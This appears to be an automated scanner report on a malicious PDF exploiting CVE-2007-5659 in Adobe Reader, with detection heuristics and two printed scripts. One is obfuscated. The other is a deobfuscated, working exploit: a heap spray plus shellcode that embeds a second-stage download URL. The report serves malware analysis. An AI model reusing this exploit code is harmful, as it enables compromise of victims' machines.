Verdict: MALICIOUS
Risk Score: 290

Malware Insights

MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF sample contains embedded JavaScript that exploits CVE-2007-5659 (Collab.collectEmailInfo) in Adobe Reader. The deobfuscated JavaScript contains a URL, http://seotraff.biz/qwe/load.php?id=2871&spl=4, which is likely used to download and execute a second-stage payload. The critical heuristics for PDF JavaScript exploit cluster and CVE-2007-5659 confirm the exploit nature of the script.
Machine Learning:
- Nyx PDF Classifier: malicious score 1.0000

Heuristics (8):
- Collab.collectEmailInfo — CVE-2007-5659 (critical, exact CVE match) [CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low, 3 related findings) [PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) [PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- PDF exploit shellcode contains an embedded download URL (high) [PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low) [PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high) [PDF_GENERIC_STAGE_RECOVERY]: Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://seotraff.biz/qwe/load.php?id=2871&spl=4 (referenced by PDF JavaScript)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x36B | 6696 bytes |

SHA-256: 729640935883daf45592be1ca2d849c8736f0a6493d2f0ffc8315f64cf7cb1a1

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 4 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
function WKVFzCwcJodPa(){eval("function im"+"p"+"lo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function g2bqSTno(CEUqo1y){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(CEUqo1y)"+";"+"}");eval("function s0TU6(nuq6M){var z1lq1CrMx="+"0,SFKZPUyWm=nuq6M.l"+"en"+"gth,RFh6KzKFsPO=10"+"2"+"4,WTCyO34lnY189,B7xOSbdAhy0,d2RcNK7='',bUbMGOvH=z1lq1CrMx,bh9Af=z1lq1CrMx,AGBoy0xzNzQ=z1lq1CrMx,tl8w5cXQ=Ar"+"ra"+"y(63,14,54,11,34,19,31,3,43,0,0,0,0,0,0,0,10,42,1,27,39,20,32,45,5,55,53,16,46,48,2,37,50,26,7,12,22,62,58,30,17,35,18,0,0,0,0,33,0,41,36,40,29,28,6,44,38,51,4,21,49,61,23,60,57,8,15,47,24,13,56,59,25,52,9);f"+"o"+"r(B7xOSbdAhy0=M"+"at"+"h.c"+"ei"+"l(SFKZPUyWm/"+"RFh6KzKFsPO)"+";B7xOSbdAhy0>z1lq1CrMx;B7xOSbdAhy0-"+"-){fo"+"r(WTCyO34lnY189=Ma"+"th.m"+"in(SFKZPUyWm,RFh6KzKFsPO);WTCyO34lnY189>z1lq1CrMx;WTCyO34lnY189-"+"-,SFKZPUyWm-"+"-){AGBoy0xzNzQ|"+"=(tl8w5cXQ[nuq6M.cha"+"rCod"+"eAt(bUbMGOvH+"+"+)-48])<"+"<bh9Af;if(bh9Af){d2RcNK7+"+"=g2bqSTno"+"(225^AGBoy0xzNzQ&"+"2"+"5"+"5);AGBoy0xzNzQ>"+">="+"8;bh9Af-"+"="+"2;}el"+"se{bh9Af="+"6"+";}}"+"}return (d2RcNK7);}var 
nL0SPraaW9EnJ3=implode('',['B6zF5fSLC@','@auT3GZVVL1NvyBidMrZc','OB7Vb5NqhzYg2B6q','Or','@tO','qVv','YBnwg','TVQYPZtYj','1tP9f3yg','NugD','Lx_JAt2x@tiBR3gnY3ON','Lzb','5IqP','B','8xMThq4uZt','Mz','7','tg','Ki@yMWVhHT8','4xD','aFrIq_','rQtOz','LoydR','3gnY3O','NL','z','b5IqPQNtgK','i@yMWVhHT84xDaF','B8','SIB7tgKi@yMWVhHT84xD','aFQixM','9f3ygNugDLx_','JA','t2','x@','tMeRSFlN','u8K7w','aCTtG@hdhNUgb','E1cbk1z','4','rQtPX','IegMWuLE','@v','hK1d','Y1ruPQRobjT','zO5Ut','M9','f3yg','Nu','gDLx_J','At2x@','c','2Bi','x','MRZp','YNTz41U','tM7QCha','ZzOfZx','Af2QPqRgh','B6zF5fe','aCNugTY','xJNW3GqfSIBRdhX3tyNfG','FX3c2B6z','F','5fg','gATmaGf','zL5RSI','B5pY','j@aF','9fz_zrSlETGyk3ulETGy','k3ulETG','y','k','3ul','Ef','mab1@l','E@GyE','r','@lE','WmJ44ulEhdyY4ul','Ehd','yX7ul','EZ','VaZ3ulEZ','Vy','k3u','lEZ','VcDN@lEZQ2X','5ulE','WVab@@lEWVaDW','@lEhmcT6@lE','TVak5','@','lEZVa','bW@lEW','dJbW@lEZA','y','F','W','@lE4ma','nn','ul','ETmyD@ulE4man','nulEWuabQulEZVaX3','ulEZVa','b1@','lEWd','JbW@l','E1','@','2X','3ulEWuyx','C','ulE','Z@','y','FNulEf','GJX3ul','EZVaK','7ul','EZV','abW@lEN@cn6ulE1@2','b1@l','EQ','G','JxCulE','W','uJK7ulE','fGJ','bNulEZVaK6','@','lEZVab','W@lEN@cn6','ulE','1@2','bQulE@@cxCu','lEN','dyE','6@lEfG','J','5n@lEZV','aXn@lE','ZVabW@lEN@cn6u','lE1@2b@ulEf','dyx','C','ulE','fma57u','lEf','GJx6@lEZ','VaZ','r@','lEZVa','bW','@lEN','@','cn6ulE1@2DW@','lE1uaxCulEfuct6ul','EfGJECulEZVa5Y','ulEZVabW','@','lE','N@cn6ul','ENVa','D1','@lET','AJn6@lE4uc53','@lE','WmJK5ulEWAJ','FN@lEZQ2X6','ulEZVabZ@lE1@ybW@lE4ucn6','ulE','WdJ41','@lE','ZV','cFN@lEZ@ax','5ulEWdJ','YW','ulEWAJ','Y','N@lEf','G','JY4ulEZVan','nulEZV','abW@lE','hGJYW@lEW','@JO4ulE','4','ma4f','ulEQd2XCu','lEZV','abW','@lEWmJbW@lEWAyFN@','lE1uc','n','nulE1man3@lE','WmJYW@lE@VaFN@l','ENdyxCu','lEZVabW@lE1VabW@lEN@c','nn','ulEhuJ','D1@lE1VJb','T@l','E','1@','cnnulEfGJDQulEZVa','x','5@lEZV','abW','@lE','N@cb@@lE1d24W@lE1Ay','b','W@lE@@yt7','ul','E1d2x7@lEZ','VcFW@lEhuctCulE','Z','Va','bW@lE4ucK','RulEWdJ4W@lEZ','Ay
FN@lEZ@','a','x5ulE','WdJY','Wul','EWAJY','N@lENVaXCulEZVabW@lEhuJbW@lE1','A','JbhulEN@cb@@lETAc41','@lE1AcZnulENdyY@','@lE@','V','at','7@l','E','1AcYW@lEN@cnnu','lE','huJD@ulE1V','JbN@lE1@cnnulEfGJ','DQulEZVa4@@lEZVabW@lEZVax5ulE4','ucKRulEWdJ4','W@lEZAJFN@lE','ZQa','x5ulE','W','dJYWulEWAJYN@lE','WV','a','XCulEZ','VabW','@lEh','uJbW@','l','EWd','JK','R','ulEW','VaFN@lEZ@ax5','ulEWdJYWulEWAJYN@lEZVaXCulE','ZVab','W@lEN@ab','W','@lE1QaY','Tul','Ef','uab@@lEfuab@@lEfu','ab@@lEfuab','@','@lEfGyn3','@lE1@Jb1@lEWdJ','Y@@','lEfdaZ','5u','lE1Q','aK','Dul','EfmaKRu','lEWd','JY','N@','lEWd','JX3ul','EZAJtr','ulE1V','ynnulE1@2','b','@ulE4','Gc','nn','ulEWd','JO','@','u','l','EW@ytr@','lEZActCulE1@2K3@','lE4u2nnulE','ZA','c4W@lETAcK3','@lENVJ','56ulET','myFZ@l','E1Gc','b@@lET','AcY4','ulE','ZQyKYulEWVaE7','ulE','NdaOZulEZAJ','tr@lE1','uy5','5@lEZAc','b','1ulENVaK','n@','lENu','aXnu','lENuyOT','ulE','4ucYNulE1@J','X','7@lEfdJnnu','lE1@Jnn','ul','EZAc4','1@lE
... (truncated)

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36B | 2711 bytes |

SHA-256: 3fb3e42b43e4494073bda8b15408400f01a2ed7bb97294a757c77a30941a0186

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 3 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
var YzCElTUsOZoa2 = new Array(); function TRwOlSeleb(aP1M1QFzdTk8xc, PQ6Yuczq2l) { while (aP1M1QFzdTk8xc.length*2<PQ6Yuczq2l){aP1M1QFzdTk8xc += aP1M1QFzdTk8xc;} aP1M1QFzdTk8xc = aP1M1QFzdTk8xc.substring(0,PQ6Yuczq2l/2); return aP1M1QFzdTk8xc; } function bWxHuuguHgL() { var Dz1Q7y4cVUi = 0x0c0c0c0c; var SK4FLpY2 = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u732F%u6F65%u7274%u6661%u2E66%u6962%u2F7A%u7771%u2F65%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3832%u3137%u7326%u6C70%u343D"); var pFmcDpFjJx = 0x400000; var YHqxdgWf33yJ = SK4FLpY2.length * 2; var PQ6Yuczq2l = pFmcDpFjJx - (YHqxdgWf33yJ+0x38); var aP1M1QFzdTk8xc = unescape("%u9090%u9090"); aP1M1QFzdTk8xc = TRwOlSeleb(aP1M1QFzdTk8xc, PQ6Yuczq2l); var gUBe3Q1YgmBtcQ = (Dz1Q7y4cVUi - 0x400000)/pFmcDpFjJx; for (var 
SJGQzBifXF=0;SJGQzBifXF<gUBe3Q1YgmBtcQ;SJGQzBifXF++) { YzCElTUsOZoa2[SJGQzBifXF] = aP1M1QFzdTk8xc + SK4FLpY2; } } function QNQdfHbJx8z1Ay() { var ewooaqFaOvN = app.viewerVersion.toString(); ewooaqFaOvN = ewooaqFaOvN.replace(/\D/g,""); var Pz2SvPsY50AO8 = new Array(ewooaqFaOvN.charAt(0),ewooaqFaOvN.charAt(1),ewooaqFaOvN.charAt(2)); if ((Pz2SvPsY50AO8[0] == 8 && ((Pz2SvPsY50AO8[1] == 1 && Pz2SvPsY50AO8[2] < 2) || Pz2SvPsY50AO8[1] < 1)) || (Pz2SvPsY50AO8[0] == 7 && Pz2SvPsY50AO8[1] < 1) || (Pz2SvPsY50AO8[0] < 7)) { bWxHuuguHgL(); var v8SLQ6HE = unescape("%u0c0c%u0c0c"); while(v8SLQ6HE.length < 44952) v8SLQ6HE += v8SLQ6HE; this.collabStore = Collab.collectEmailInfo({subj: "",msg: v8SLQ6HE}); } } QNQdfHbJx8z1Ay();